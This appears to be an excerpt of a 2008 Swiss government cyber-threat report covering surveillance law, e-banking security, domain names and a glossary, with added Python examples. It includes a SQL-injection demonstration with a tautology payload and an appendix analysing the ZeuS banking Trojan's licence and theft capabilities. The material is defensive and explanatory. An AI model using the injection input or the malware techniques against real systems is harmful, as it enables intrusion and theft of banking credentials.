At the end of February 2008, the Federal Constitutional Court of Germany decided that
online searches are only permissible under strict conditions. 22 The Constitutional Protection
Act of North Rhine-Westphalia, which provided for the secret search of private computers
without significant conditions, was thus declared void. 23 The court decided that when
conducting online searches, law enforcement officers had to respect a basic right
guaranteeing the confidentiality and integrity of IT systems. Breaches of this right are
possible both as a preventive measure and for criminal prosecution, but only under strict
conditions. An online search may only be conducted if there are “actual indications of a
concrete threat to a surpassingly important legally protected interest”. The search must be
authorized by a judge, and data concerning the absolutely protected core areas of private life
must be deleted immediately.

At the beginning of June 2008, the Federal Cabinet adopted a law expanding the
competences of the Federal Criminal Police Office (BKA) in the fight against terrorism. 24 For
the first time, the BKA will receive the power to defend against threats and thus obtain
competences going beyond investigative activities. The law provides that the BKA may carry
out online searches of private computers. Supporters emphasize the need for this law in the
fight against terrorism as well as its legal conformity, also with respect to the judgement of
the Federal Constitutional Court cited above. Opponents doubt this need and believe the law
is unconstitutional, especially with respect to separation of police and secret service
activities. Whether the law will actually enter into force in this form is questionable, since it
must still be approved by Parliament. 25

In Switzerland, online searches without concrete suspicion of an offence have been
prohibited so far. The new draft Federal Law on the Maintenance of Internal Security
does, however, provide for intrusions into computers. This measure is likely to be carried out only in
exceptional cases and under strict conditions. The Federal Parliament has not yet
considered the draft law.




22 For the decision of the Federal Constitutional Court, see:
http://www.bundesverfassungsgericht.de/entscheidungen/rs20080227_1bvr037007.html and for the press release
see: http://www.bundesverfassungsgericht.de/pressemitteilungen/bvg08-022.htmls (as of: 29.07.2008).
23 For the Constitutional Protection Act of North Rhine-Westphalia, see MELANI semi-annual report 2007/2,
Chapter 7.1: http://www.melani.admin.ch/dokumentation/00123/00124/01048/index.html?lang=en (as of: 29.07.2008).
24 For the draft law, see:
http://www.bmi.bund.de/Internet/Content/Common/Anlagen/Gesetze/Entwurf__BKAG,templateId=raw,property=publicationFile.pdf/Entwurf_BKAG.pdf
and for further information from the Federal Ministry of the Interior, see:
http://www.bmi.bund.de/nn_165104/Internet/Content/Themen/Terrorismus/DatenundFakten/Online-Durchsuchungen.html (as of: 29.07.2008).
25 For more information on the debate, see:
http://www.heise.de/newsticker/Bundesregierung-beharrt-auf-heimlichen-Online-Durchsuchungen--/meldung/108955 and
http://www.heise.de/newsticker/Grosse-Koalition-verteidigt-geplante-Novelle-des-BKA-Gesetzes--/meldung/109743 (as of: 29.07.2008).
France: Arming for the Fight against Cyberattacks

In June 2008, France presented its strategic orientation for defence and national security.
Some of the planned changes also concern Internet crime. Against the background of the
current threat situation, France wants to arm itself better against any cyberattacks. The
defence of network and information systems will be expanded and newly coordinated. This
will occur within the framework of a new entity, the “Agence de la sécurité des systèmes
d’information”. But France also wants to invest in offensive capabilities. The white paper also
underscores the need to strengthen cooperation at the European level in the defence against
attacks on information systems. 26

In its white paper, France emphasized that cyberspace has become a new battlefield for
military operations, requiring France to arm itself in this area as well. In fact, an increasing
number of States see the need for military action in cyberspace and are building up capacity.
These States include the US and China. 27 This indicates that more and more States are
reassessing the military potential of information systems, so that the classical armament
behaviour of sovereign States will no longer ignore cyberspace.




Sweden: Controversial Surveillance Act Adopted by Parliament

In June 2008, the Swedish Parliament passed a controversial security law expanding
surveillance powers of the military secret service. The law allows the military secret service
to monitor all Swedish e-mail, telephone, and text message traffic abroad. A court order is
not required. On the technical side, the main data connections between Sweden and foreign
countries will be fitted with filters reacting to specific search terms. The law will enter into
force in January 2009. The government cites the need to identify external threats such as
terrorist or military attacks more quickly. This decision has met with fierce criticism, triggering
a major political debate in Sweden. In particular, critics fear deep breaches of civil rights
without sufficient possibilities of protection and control. A Swedish civil rights foundation has
filed a complaint with the European Court of Human Rights. 28




NATO: Excellence Centre for Cyber Defence Established in Estonia

Almost exactly one year after the computer attacks on Estonia, 29 seven NATO members
(Estonia, Germany, Italy, Latvia, Lithuania, Slovakia and Spain) signed a pact in May 2008 to
establish a Cooperative Cyber Defence Centre of Excellence in Tallinn. This centre will
reportedly house up to thirty experts. Its main focus will be on the defence of computer networks
in member countries against attacks. 30 The USA will join the project as an observer, and
other member countries are expected to join in the years to follow. NATO has Centres of
Excellence in various fields in various countries; they have an advisory and research role
rather than being directly involved in operations.

26 Livre blanc sur la défense et la sécurité nationale, tome 1, partie 1:
http://www.premier-ministre.gouv.fr/IMG/pdf/livre_blanc_tome1_partie1.pdf (as of: 21.07.2008).
27 See also MELANI semi-annual report 2007/1, Chapter 7.2:
http://www.melani.admin.ch/dokumentation/00123/00124/01029/index.html?lang=en (as of: 21.07.2008).
28 For additional information, see also: http://www.economist.com/agenda/displaystory.cfm?story_id=11778941;
http://www.spiegel.de/netzwelt/web/0,1518,560637,00.html and
http://www.centrumforrattvisa.se/index.php/publisher/articleview/frmArticleID/23/ (as of: 28.07.2008).
29 For the attack against Estonia, see MELANI semi-annual report 2007/1, Chapter 5.1:
http://www.melani.admin.ch/dokumentation/00123/00124/01029/index.html?lang=en (as of: 28.07.2008).

Although a centre for computer defence was already planned before the attacks against
Estonia, the timing was most likely accelerated and the location fixed in reference to the
attacks. Even though it will remain difficult to find the perpetrators of such attacks, one thing
is clear: Internet crime is transnational and demands international cooperation to combat it
effectively. The member countries of this centre are also striving to develop a legal definition
of cyberattack. The need for this was also seen during the attacks against Estonia.




EU: Extension of European Network and Information Security Agency, ENISA

In June 2008, the EU Commission decided to extend the duration of the European Network
and Information Security Agency (ENISA) established in 2004 by another three years. 31
ENISA serves EU Member States and bodies as a contact and advisory office on questions
of network and information security.

The EU Commission had previously demanded reforms of ENISA, since it was said to have
insufficient resources for successfully confronting future challenges. No reforms were
included with this decision, however. Its continued existence after 2012 will be decided at a
later time.




7.2 Private Sector

Improved Security Measures for E-Banking

As already mentioned in our semi-annual report 2007/2, numerous financial institutions are
strengthening their security mechanisms for e-banking. Improved internal filtering
systems help to identify fraudulent transfers. Some financial institutions are also introducing
new authentication methods. Since April 2008, the Zurich Cantonal Bank (ZKB) and the
Raiffeisen banks have been using mobile transaction numbers (m-TAN). Before a transfer is
finalized, the client receives a text message for verification. This allows the client to take one
more look at the currency, amount, and account number of the recipient before releasing the
payment. The online bank assumes the costs. To improve security, Migros Bank has
offered a comprehensive USB stick solution since July 2008. All e-banking clients receive
a free USB stick and a chip card with a PIN code. The USB stick contains a hardened
browser developed especially for Migros Bank. Only this browser can access the e-banking
application. The browser installed on the client's computer, which may be compromised
by malicious software, is no longer needed.




30 See e.g.: http://news.bbc.co.uk/2/hi/europe/7401260.stm and
http://www.heise.de/security/Estland-erhaelt-NATO-Excellence-Center-fuer-Cyber-Defense--/news/meldung/107879 (as of: 08.07.2008).
31 http://www.enisa.europa.eu/pages/02_01_press_2008_06_13_extension.html (as of: 24.07.2008).

Many financial institutions are counting on internal filtering and controlling mechanisms to
identify fraudulent transactions. Additionally, authentication methods are being adjusted to
current circumstances. With their introduction, the problems relating to e-banking malware
should subside somewhat in the coming months.
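The m-TAN release step described above, as an added example that models both sides (it is not the implementation of ZKB, Raiffeisen or any other bank): the bank binds the TAN to the transfer details it received, the client's "one more look" compares the details in the text message with the transfer actually intended, and the bank accepts the TAN only for those exact details. The message format, the HMAC-based TAN derivation and the account numbers are constructed assumptions.

```python
"""Model of an m-TAN release step: the bank sends the transfer details plus a
TAN bound to those details by text message, the client compares the details
with the transfer actually intended before releasing, and the bank accepts the
TAN only for the exact details it was issued for.

Added illustration, not the mechanism of any named bank. The message format,
the TAN derivation (HMAC over the details) and the account numbers are
constructed."""
import hashlib
import hmac
import re
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass(frozen=True)
class Transfer:
    amount: str      # decimal string, e.g. "1250.00"
    currency: str    # ISO code, e.g. "CHF"
    recipient: str   # recipient account; placeholder values below


SMS_RE = re.compile(r"^Transfer (\S+) (\S+) to (\S+)\. TAN: (\d{6})$")


class BankServer:
    def __init__(self, key: bytes):
        self._key = key
        self._pending: Dict[str, Tuple[Transfer, str]] = {}  # session -> (transfer, nonce)

    def _tan(self, t: Transfer, nonce: str) -> str:
        # Six digits derived from an HMAC over a fresh nonce and all transfer
        # details, so a TAN issued for one transfer cannot release a different one.
        msg = "|".join((nonce, t.amount, t.currency, t.recipient)).encode()
        digest = hmac.new(self._key, msg, hashlib.sha256).digest()
        return f"{int.from_bytes(digest[:4], 'big') % 1_000_000:06d}"

    def request_mtan(self, session: str, t: Transfer) -> str:
        """Store the transfer as received from the browser and return the SMS text."""
        nonce = secrets.token_hex(8)
        self._pending[session] = (t, nonce)
        return f"Transfer {t.amount} {t.currency} to {t.recipient}. TAN: {self._tan(t, nonce)}"

    def release(self, session: str, t: Transfer, tan: str) -> bool:
        """Execute the transfer only if the TAN matches these exact details."""
        pending = self._pending.pop(session, None)
        if pending is None:
            return False
        stored, nonce = pending
        if stored != t:          # details changed between SMS and release
            return False
        return hmac.compare_digest(self._tan(t, nonce), tan)


def client_confirms(intended: Transfer, sms: str) -> Optional[str]:
    """The 'one more look' on the phone: return the TAN only if currency, amount
    and recipient in the SMS are the ones the client intended."""
    m = SMS_RE.match(sms)
    if m is None:
        return None
    amount, currency, recipient, tan = m.groups()
    if (amount, currency, recipient) != (intended.amount, intended.currency, intended.recipient):
        return None
    return tan


def demo() -> Tuple[bool, Optional[str]]:
    """Constructed scenario: an honest transfer, then the same transfer with the
    recipient swapped by malware in the browser before it reaches the bank."""
    bank = BankServer(secrets.token_bytes(32))
    intended = Transfer("1250.00", "CHF", "CH00-EXAMPLE-0001")   # placeholder account

    sms = bank.request_mtan("sess-1", intended)
    honest = bank.release("sess-1", intended, client_confirms(intended, sms) or "")

    tampered = Transfer("1250.00", "CHF", "CH00-EXAMPLE-9999")   # placeholder account
    sms = bank.request_mtan("sess-2", tampered)                  # bank only sees the tampered order
    tan = client_confirms(intended, sms)   # phone shows the wrong recipient -> None
    return honest, tan


if __name__ == "__main__":
    print(demo())   # (True, None)
```

The scenario in demo() shows why the second channel helps: if malware in the browser swaps the recipient before the order reaches the bank, the text message displays the swapped recipient, the client withholds the TAN and nothing is released; and because the TAN is derived from the details, a TAN issued for one order does not release a differently worded one.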




WLAN in SBB First Class Carriages

The Swiss Federal Railways SBB upgraded the business compartments in 75 first class
carriages by installing Swisscom WLAN. After several attempts – the first trials were
conducted in 2003 – the requisite infrastructure was completed at the end of March 2008 and
successfully tested.

For some time already, Mobile Unlimited cards have granted access to the Internet on trains.
These connections require a special subscription with a PCMCIA card, however. A WLAN
card and a first class ticket are now all one needs to get online with ease while travelling by
train. In addition to billing via cell phones, anonymous prepaid offers are also available.
Problems associated with such offers are described in Chapter 6.




ICANN: Creation of New Top Level Domains

At its 32nd meeting in Paris, the Internet Corporation for Assigned Names and Numbers
(ICANN) decided to create a standardized procedure for establishing new top level domains
(TLDs). It is expected that, from the second quarter of 2009, anyone will in
principle be able to apply to administer a domain name. TLDs with Cyrillic or Chinese characters will
also become available then.

Previously, Russian President Dmitry Medvedev had called for Cyrillic TLDs to be allowed,
since Russian is losing significance on the Internet in comparison with English. The opening
for new domain names was decided unanimously at the conclusion of a week-long
conference in Paris. Now, rules for granting licences will be developed. Within a limited
period, interested persons must first apply for introduction of the domain, and all applications
will be published. Any objections on grounds of racism, competitive conflicts, or too great
similarity of the addresses can be made. Four months are envisaged for the entire process.
Internationalized Domain Names (IDNs) were already introduced in 2003. These may
contain non-ASCII characters such as German umlauts, kanji, Hebrew, Arabic, or
Cyrillic characters. These characters, encoded in Unicode, are converted by Punycode-
compatible applications into ASCII text that can be read by Internet applications. So far,
however, this only works at the second level and below.

Internationalized domain names (IDNs) have been an integral part of the Domain Name
System (DNS) for four years already. They permit the use of country-specific special
characters at the level of second level domains; every registrar can freely decide whether
and what special characters to offer. 32 In Switzerland, these are primarily umlauts and
accents. As with the introduction of IDNs four years ago, the introduction of arbitrary TLDs
will certainly raise questions, such as first access rights and the permissibility of extensions.



32 https://nic.switch.ch/reg/ocView.action?res=EF6GW2JBPVTG67DLNIQWQ337PUQWO2TAEBSH27Q (as of: 11.08.2008).
An additional number of characters also increases the fraud potential for typo domains and
domains with similar pronunciation or spelling. The phishing trick via domains with umlauts
comes to mind. 33
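Punycode conversion and two checks for the look-alike risk just mentioned, as an added example (not code from ICANN, SWITCH or MELANI). It uses the IDNA codec in Python's standard library; the domain names and the list of protected names are constructed.

```python
"""IDN conversion and two look-alike checks for the fraud potential mentioned
above. Added illustration, not code from ICANN, SWITCH or MELANI; it uses the
IDNA (Punycode) codec shipped with Python. The domain names are constructed."""
import unicodedata
from typing import List, Set


def to_ascii(domain: str) -> str:
    """Unicode name -> ASCII-compatible 'xn--' form that the DNS actually carries."""
    return domain.encode("idna").decode("ascii")


def to_unicode(domain: str) -> str:
    """Reverse: what a browser displays for an 'xn--' name."""
    return domain.encode("ascii").decode("idna")


def label_scripts(label: str) -> Set[str]:
    """Scripts used by the letters of one label, taken from the Unicode character
    names ('LATIN SMALL LETTER A' -> 'LATIN', 'CYRILLIC SMALL LETTER A' -> 'CYRILLIC')."""
    return {unicodedata.name(ch).split()[0] for ch in label if ch.isalpha()}


def mixed_script_labels(domain: str) -> List[str]:
    """Labels that mix scripts, the classic sign of a homograph look-alike.
    Accepts either the Unicode or the 'xn--' form."""
    return [lbl for lbl in to_unicode(to_ascii(domain)).split(".")
            if len(label_scripts(lbl)) > 1]


def fold_diacritics(label: str) -> str:
    """Strip umlauts and accents: 'bänk' -> 'bank'."""
    decomposed = unicodedata.normalize("NFKD", label)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))


def umlaut_lookalikes(domain: str, protected: List[str]) -> List[str]:
    """Protected second-level names this domain imitates once diacritics are removed
    (the 'umlaut phishing' pattern): the folded label matches, the real one does not."""
    first = to_unicode(to_ascii(domain)).split(".")[0].lower()
    folded = fold_diacritics(first)
    return [p for p in protected if folded == p.lower() and first != p.lower()]


if __name__ == "__main__":
    print(to_ascii("münchen.example"))                      # xn--mnchen-3ya.example
    print(mixed_script_labels("b\u0430nk.example"))         # ['bаnk'] (Cyrillic а)
    print(umlaut_lookalikes("mybänk.example", ["mybank"]))  # ['mybank']
```

Both checks work on the displayed (Unicode) form, which is what a user sees; a registry or mail filter would run them on the xn-- form received on the wire, which is why the functions convert first.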




8 Legal Foundations

Federal Council Rejects New Legislation to Combat Network Crime

At the end of February 2008, the Federal Council rejected new legislation to combat network
crime. According to the Federal Council, the current law suffices to successfully prosecute
offences committed by means of electronic communication networks such as the Internet or
cell phone networks. A new explicit regulation of the criminal responsibility of providers was
rejected for this reason. However, the Federal Council applied for approval of two
parliamentary motions providing for the expansion of Internet surveillance and ratification of
the Cybercrime Convention. Under the first motion, resources will be increased to expand the
monitoring and evaluation of jihadist and violent extremist Internet sites. Under the second
motion, the Federal Council supports ratification of the Council of Europe Cybercrime
Convention. The Swiss legal order already largely complies with the demands of this
Convention. The need for amendments in criminal law and criminal procedure is currently
being reviewed in detail. 34




33 http://www.melani.admin.ch/dienstleistungen/archiv/00478/index.html?lang=en (as of: 11.08.2008).
34 For additional information, see:
http://www.ejpd.admin.ch/ejpd/de/home/themen/kriminalitaet/ref_gesetzgebung/ref_netzwerkkriminalitaet.html (as of: 28.07.2008).


9 Glossary
This glossary contains all terms in italics in this semi-annual report. A more detailed glossary
with more terms can be found at:
http://www.melani.admin.ch/glossar/index.html?lang=en.



Access point                         A wireless access point is an electronic device acting as an
                                     interface between a wireless network and a cable computer
                                     network.

ActiveX                              A technology developed by Microsoft to download small
                                     applications, so-called ActiveX controls, to the client’s computer
                                     from where they run when web pages are viewed. They enable
                                     different effects and functions to be carried out. Unfortunately this
                                     technology is often abused and represents a security risk. For
                                     example, dialers are downloaded through ActiveX to the computer
                                     and run. ActiveX problems only concern Internet Explorer because
                                     the other browsers do not support this technology.

Bot / Malicious Bot                  Comes from the Slavic word “robota” meaning work. Refers to a
                                     program that automatically carries out certain actions upon
                                     receiving the command. So-called malicious bots can control
                                     compromised systems remotely and have them carry out arbitrary
                                     actions.

Botnet                               A collection of computers infected with malicious bots. These can
                                     be fully remotely controlled by the attacker (the owner of the
                                     botnet). Depending on its size, a botnet may consist of several
                                     hundred to millions of compromised computers.

Critical (national)                  Infrastructure or part of the economy whose failure or breakdown
infrastructure                       would have enormous consequences on national security or the
                                     economic and/or social welfare of a nation. In Switzerland the
                                     following infrastructure has been defined as critical: energy and
                                     water supply, emergency and rescue services,
                                     telecommunications, transport and traffic, banks and insurance,
                                     government and public administration. In the information age their
                                     smooth running is increasingly dependent upon information and
                                     communication systems. Systems such as these are referred to as
                                     critical information infrastructures.

Defacement                           Unauthorized alteration of websites.

DNS                                  Domain name system

                                     With the help of DNS the internet and its services can be utilised in
                                     a user-friendly way, because users can utilise names instead of IP
                                     addresses (e.g. www.melani.admin.ch).

DoS / DDoS attacks                   Denial of service attacks / Distributed denial of service attacks

                                     Have the goal of causing a loss of a specific service to users or at
                                     least to considerably restrict the accessibility of the service.
                                     Distributed denial of service attacks are attacks where the victim is
                                     simultaneously attacked by many different systems.

Downloader                           Initial component of a malware infection, may lead to an infection
                                     with further malicious programs. The downloader downloads the
                                     actual virus, Trojan, etc., and launches it on the infected system.

Drive-by infection                   Infection of a computer with malware simply by visiting a website.
                                     Often the websites concerned contain reputable offerings and have
                                     already been compromised beforehand for the purposes of
                                     spreading the malware. The infection occurs mostly by trying out
                                     exploits for vulnerabilities not yet patched by the visitor.

Exploit code                         (or exploit)

                                     A program, a script or a line of code with which vulnerabilities in a
                                     computer system can be used to advantage.

Firewall                             A firewall protects computer systems by monitoring incoming and
                                     outgoing connections and rejecting them if necessary. A personal
                                     firewall (also called a desktop firewall), on the other hand, is
                                     designed to protect a stand-alone computer and is installed directly
                                     on it.

FTP                                  File Transfer Protocol (FTP) is a network protocol for transferring
                                     data via TCP/IP networks. FTP can be used, for instance, to load
                                     websites onto a webserver.

IFrame                               An IFrame (also inline frame) is an HTML element used to
                                     structure websites. It is used to integrate external web contents
                                     into one’s own website.

IP address                           Address to uniquely identify computers on the Internet or on a
                                     TCP/IP-network (e.g.: 172.16.54.87).

JavaScript                           An object-based scripting language for developing applications.
                                     JavaScripts are programme components integrated in HTML code
                                     enabling specific functions in internet browsers. For example, while
                                     checking user input on an internet form, a JavaScript can verify
                                     that all the characters entered of a telephone number are actually
                                     numbers. As is the case with ActiveX Controls, JavaScripts are run
                                     on the client's computer. Unfortunately dangerous functions can
                                     also be programmed with JavaScripts. In contrast to ActiveX,
                                     JavaScript is supported by all browsers.

Keylogger                            Devices or programmes in operation between the computer and
                                     the keyboard to record keystrokes.

MAC address                          Media Access Control. Unique and globally identifiable hardware
                                     address of a network adapter. The MAC address is written in the
                                     ROM of the adapter by the respective manufacturer (e.g.
                                     00:0d:93:ff:fe:a1:96:72).

Malware/Malicious Code               Comes from the terms "malicious" and "software". Generic term for
                                     software which carries out harmful functions on a computer. This
                                     comprises amongst others viruses, worms, Trojan horses.

Patch                                Software which replaces the faulty part of a programme with a
                                     fault-free version. Patches are used to eliminate vulnerabilities.

Pharming                             Manipulation of name resolution via DNS or via local configuration
                                     (e.g. host files) with the aim of redirecting users to false servers so
                                     as to gain access to confidential data (login data).

Phishing                             Fraudsters phish in order to gain confidential data from
                                     unsuspecting Internet users. This may, for example, be account
                                     information from online auctioneers (e.g. eBay) or access data for
                                     Internet banking. The fraudsters take advantage of their victim's
                                     good faith and helpfulness by sending them e-mails with false
                                     sender addresses.

PHP                                  PHP is a scripting language mainly used to create dynamic
                                     websites or web applications.

Plugin                               (Additional) software that extends the basic functions of an
                                     application, e.g. Acrobat plugins for internet browsers allow direct
                                     display of PDF documents.

Proxy bot                            A system for accepting and forwarding browser queries. In the
                                     case of a proxy bot, this task is assumed by a botnet. The primary
                                     purpose is to anonymize identity, since the IP address displayed is
                                     that of the bot, not that of the user actually submitting the browser
                                     query.

rar                                  rar is an algorithm and file format for data compression, in order to
                                     reduce the storage space needed for the archiving and transfer of
                                     files.

Router                               Computer network, telecommunication, or also Internet devices
                                     used to link or separate several networks. Routers are used, for
                                     instance, in home networks, establishing the connection between
                                     the internal network and the Internet.

Server                               Computer system which provides clients with certain resources or
                                     data, such as storage space, services (e.g. e-mail, internet, FTP,
                                     etc.).

Social Engineering                   Social engineering attacks take advantage of people's helpfulness,
                                     credulity or lack of self confidence in order to gain access to
                                     confidential data or to prompt them to perform certain actions, for
                                     example.

Spam                                 Spam refers to unsolicited and automatically sent mass advertising,
                                     into which category spam e-mails also fall. The person responsible
                                     for these messages is known as a spammer, whereas the actual
                                     sending itself is known as spamming.

SQL database                         Database built with the Structured Query Language (SQL)
                                     database language. SQL has a relatively simple structure based
                                     semantically on English. SQL provides numerous commands for
                                     manipulating data pools (insert, modify, and delete datasets) and
                                     for querying data.

SQL injection                        SQL injection refers to the exploitation of a vulnerability in
                                     connection with SQL databases, resulting from insufficient
                                     validation of the variables passed into a query. The attacker
                                     attempts to inject his own database commands, in order to change
                                     the data as desired or to gain control over the server.
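As an added illustration of this glossary entry (example code written for this page, not taken from the report): the same account lookup written once with string concatenation, which is exactly the missing validation the entry describes, and once with a bound parameter, which is the standard mitigation. The table, its rows and the function names are constructed for the demonstration; the in-memory SQLite database stands in for any SQL server.

```python
"""Vulnerable versus parameterized SQL lookup, side by side (added example).

Uses an in-memory SQLite database with constructed rows; the table name,
the rows and the function names are assumptions made for this demonstration.
"""
import sqlite3


def make_db():
    """Constructed sample data: two accounts in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)", [("alice", 100), ("bob", 250)]
    )
    return conn


def lookup_vulnerable(conn, name):
    """The defect the glossary describes: the variable is spliced into the
    statement text without validation, so the input can change the query's
    structure instead of only its data."""
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, name):
    """Mitigation: a bound parameter is always handled as a value and can
    never be interpreted as part of the SQL statement."""
    query = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(query, (name,))]


def demo():
    """Run both lookups with the classic tautology input and return
    (vulnerable result, safe result) so the difference can be checked."""
    conn = make_db()
    tautology = "x' OR '1'='1"
    return lookup_vulnerable(conn, tautology), lookup_safe(conn, tautology)


if __name__ == "__main__":
    vulnerable, safe = demo()
    print("concatenated query returned:", vulnerable)  # every row leaks
    print("parameterized query returned:", safe)       # no such user
```

The concatenated version returns every account because the input rewrites the WHERE clause into a condition that is always true; the parameterized version returns nothing because the same text is compared literally against the name column. The fix is not to escape quotes by hand but to never build statement text from untrusted input.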

SYN flood                            A SYN flood is a type of DDoS attack on a computer system. The
                                     attack exploits the way the TCP transport protocol establishes
                                     connections in order to make individual services or entire
                                     computers inaccessible from the network.

Trojan horses                        Trojan horses (often referred to as Trojans) are programs that
                                     covertly perform harmful actions while disguised as a useful
                                     application or file.

Vulnerabilities                      A loophole or bug in hardware or software through which attackers
                                     can access a system.

WEP                                  Wired Equivalent Privacy. An early encryption protocol used in
                                     WLAN connections, now considered insecure.

WLAN                                 WLAN stands for Wireless Local Area Network.

WPA                                  Wi-Fi Protected Access. Improved encryption method used in
                                     wireless LAN connections.

WPA2                                 Wi-Fi Protected Access 2. New security standard for wireless LANs
                                     in accordance with the IEEE 802.11i specification. Successor to
                                     the WPA technique and to the WEP technique, which is considered
                                     insecure.

zip                                  zip is an algorithm and file format for data compression, in order to
                                     reduce the storage space needed for the archiving and transfer of
                                     files.







10 Appendix

10.1 Professionalization of Internet Crime: The Example of ZeuS
For some time, a worrying trend of professionalization in Internet crime has been observed. 35
Different groups of criminals concentrate on specific areas and recruit individuals with
considerable expertise. This know-how is then provided, rented out, or sold to third parties.
The goal is of course always to make money.

One example of this division of labour can be seen in the sale of software, or rather of a bot
(= spy software), named ZeuS, which can be found in different variants and under different
names. One variant, for example, is Wsnpoem, a Trojan horse attacking e-banking systems.

An older version of this software is now freely available on the Internet, which was certainly
not the intention of its authors. An end user licence agreement is used in an attempt to limit
free distribution. Given the clientele to which it is addressed, this is likely rather difficult to
accomplish, however. The installation package also contains a detailed user manual in
Russian. We will analyze excerpts below and show how easy the use of this software is. We
will also point out the quality of support offered by the ZeuS developers.

User licence:


     1. The seller:
            1. Provides qualified technical support via the Internet.
            2. Bears no responsibility for:
                       data loss
                       closure/shutdown of servers
                       traffic costs
            3. Undertakes to correct errors found in the functioning of ZeuS and to send updates within the
                shortest possible time without financial consideration.
            4. Undertakes to listen to any suggestions/opinions/feedback on the functioning of ZeuS and to take
                appropriate decisions.

     2. The customer:
            1. Is not entitled to distribute ZeuS for any commercial or non-commercial purposes that do not
               correspond to the interests of the seller.
            2. Is not entitled to disassemble/analyse the binary code of the bot and of the builder.
            3. Is not entitled to use the control panel to manage other botnets or for any other purposes
               unrelated to ZeuS.
            4. Is not entitled to deliberately send any parts of ZeuS to anti-virus software manufacturers or
               other similar institutions.
            5. Undertakes to pay the seller for every update of ZeuS that is not related to errors in its
               functioning, and likewise for the addition of any additional functionality.




35
   See also MELANI semi-annual report 2006/2:
http://www.melani.admin.ch/dokumentation/00123/00124/01019/index.html?lang=en (as of: 21 July 2008),
and the following Symantec Internet Security Threat Report:
http://eval.symantec.com/mktginfo/enterprise/white_papers/ent-whitepaper_internet_security_threat_report_xii_exec_summary_09_2007.en-us.pdf (as of: 21 July 2008).

If this agreement is violated and the violation is discovered, you forfeit any technical support. In addition,
the bot of your build will be sent immediately to the anti-virus software manufacturers.

The contract imitates licence conditions of commercial software, although this programme is
intended for sale on the black market. How can one prevent the software from being shared,
especially in an environment where the normal rules do not apply? The developers have
chosen the path of sanctions. A violation of the agreement has consequences: denial of
technical support or reporting of the bot to anti-virus software manufacturers. The fact that
the software ultimately ended up freely downloadable on the Internet shows that these
measures did not have the desired deterrent effect, however.

Product description:

ZeuS is spy software (spyware, hereinafter "bot") for 32-bit MS Windows 2000/XP and serves to control the
computers of victims and to obtain information from them by means of logs.

ZeuS consists of three parts:

         1. a control panel, which is installed on the server(s),
         2. the builder, a Windows application used to configure the bot,
         3. the bot, a Windows application, which however is executed on the victim's computer.

ZeuS has the following basic capabilities and features (the complete list is given here; part of this list may be
missing in your build):

   1. The bot:
          1. Written in VC++ 8.0 without using the RTL etc., in pure WinAPI, which results in a small size
               (10-25 KB, depending on the package build).
          2. Has no process of its own, so it cannot be discovered in the list of processes.
          3. Bypasses the majority of firewalls (including the popular Outpost Firewall versions 3 and 4; there
               is, however, a temporary minor problem with anti-spyware programs). Unhindered acceptance of
               incoming connections cannot be guaranteed.
          4. Is difficult to find by search/analysis; the bot installs itself on the victim's machine and creates a
               file with the time [probably: creation/modification date, translator's note] of system files and an
               arbitrary file size.
          5. Works under restricted Windows user accounts (use under guest accounts is currently not
               supported).
          6. Invisible to the heuristics of anti-virus software; the body of the bot is encrypted.
          7. Does not arouse any suspicion of its presence if you do not want it to. This refers to things that
               many spyware authors love: disabling firewalls and anti-virus software, preventing updates of
               these programs, blocking Ctrl+Alt+Del, etc.
          8. Blocking of the Windows firewall (this function is only required for the unhindered acceptance
               of incoming connections).



The bot exhibits similarities with many equivalent software programmes, such as the
possibility of deactivating firewalls and anti-virus programmes, preventing updates, blocking
task managers, and much more.

             9.  The bot stores/receives/sends all its settings/logs/commands in encrypted form via the HTTP(S)
                 protocol (i.e. only you will see the data in text form; all other bot <-> server traffic will look
                 like garbage).
             10. NAT detection by checking its own IP via a website specified by you.
             11. Separate configuration file; protects against loss of the botnet if the main server is unavailable.
                 In addition, further (backup) configuration files, which the bot accesses if the main
                 configuration file is unavailable. This system guarantees the survival of your botnet in 90% of
                 all cases.



Also of interest is the fallback mechanism: should the central command and control server (C&C) fail,
for instance after police intervention, it is intended to switch the botnet to a backup server so that
the botnet keeps functioning. An alternative URL for the configuration file serves this purpose. The
programmers assure that this guarantees sufficient robustness of the network.

             12. It can work with any browsers/programs that operate via wininet.dll (Internet Explorer, AOL,
                 Maxton etc.):
                 1. Interception of POST data + interception of keystrokes (including data pasted from the
                      clipboard).
                 2. Transparent URL redirection (to fake websites etc.) with specification of the simplest redirect
                      conditions (for example: only on a GET or POST request, when certain data is present in or
                      absent from the POST request).
                 3. Transparent HTTP(S) substitution of content (webinject, which allows the replacement not
                      only of an HTML page but of any other data type). The replacement is carried out by
                      specifying replacement masks.
                 4. Retrieval of the content of a required page with HTML tags excluded. Based on webinject.
                 5. Customizable TAN grabber for any country.
                 6. Retrieval of a list of "Bank Of America" questions and answers after successful
                      authorization.
                 7. Deletion of desired POST data on desired URLs.
                 8. IDEAL SOLUTION FOR VIRTUAL KEYBOARDS: after you have gone to the desired URL, a
                      screenshot is taken of the area of the screen in which the left mouse button was pressed.
                      Retrieval of certificates from the "MY" store (certificates marked "not exportable" are not
                      exported correctly) and clearing of that store. After that, any imported certificate is saved
                      on the server.
             13. Interception of logins/passwords of the POP3 and FTP protocols (regardless of port) and
                 recording of these in the log only on successful authorization.
             14. Modification of the local DNS, deletion/addition of the entries in the file %system32%, i.e.
                 mapping of the specified domain to the specified IP for WinSocket.
             15. Saves the content of the "Protected Storage" on first start on the computer.
             16. Deletes cookies from the Internet Explorer cache on first start on the computer.
             17. Search by search mask for files on logical drives, or download of a specific file.
             18. Recording of recently visited pages on first start on the computer. Useful for installation via
                 sploits: if you purchase the download from a dubious service, you can find out in this way
                 what else is being loaded in parallel.
             19. Real-time screenshot of the victim's computer; the computer must be outside NAT.
             20. Receipt of server-side commands and return of reports on their successful execution.
                 (Currently: starting local/remote files, immediate update of the configuration file, destruction
                 of the operating system.)
             21. Socks4 server.
             22. HTTP(S) proxy server.
             23. Upgrade of the bot to the latest version (the URL of the new version is written into the
                 configuration file).

   2. The control panel:

This chapter introduces the user interface of the control panel. It is similar to the interface of
